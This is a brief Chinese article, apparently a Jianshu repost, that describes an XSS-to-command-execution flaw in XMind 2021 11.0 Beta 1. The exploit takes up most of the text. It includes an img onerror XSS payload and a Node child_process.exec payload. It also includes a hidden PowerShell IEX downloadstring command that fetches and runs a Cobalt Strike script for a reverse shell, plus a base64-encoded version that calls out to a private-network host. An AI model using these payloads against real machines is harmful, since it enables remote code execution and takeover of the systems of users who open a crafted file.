XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行

文章来源: Khan安全攻防实验室

漏洞利用方式:


选择事件型XSS需要附带onerror事件,比如img、audio等。


弹窗代码:


<img src=x oneror=alert(1)>


构造命令执行payload


require('child_process').exec('ipconfig/all',(error, stdout, stderr)=>{alert(`stdout:${stdout}`);  });


最终利用代码:



反弹shell命令


CS生成powershell脚本


powershell.exe -nop -w hidden -c"IEX((new-objectnet.webclient).downloadstring('http://127.0.0.1/test/'))" require('child_process').exec('powershell.exe-nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring(\'http://127.0.0.1/test\'))"',(error,stdout, stderr)=>{alert(`stdout:${stdout}`);  }); cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguNzIuMTI5OjgwODEvYWJjZGVcJykpIicsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==


©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容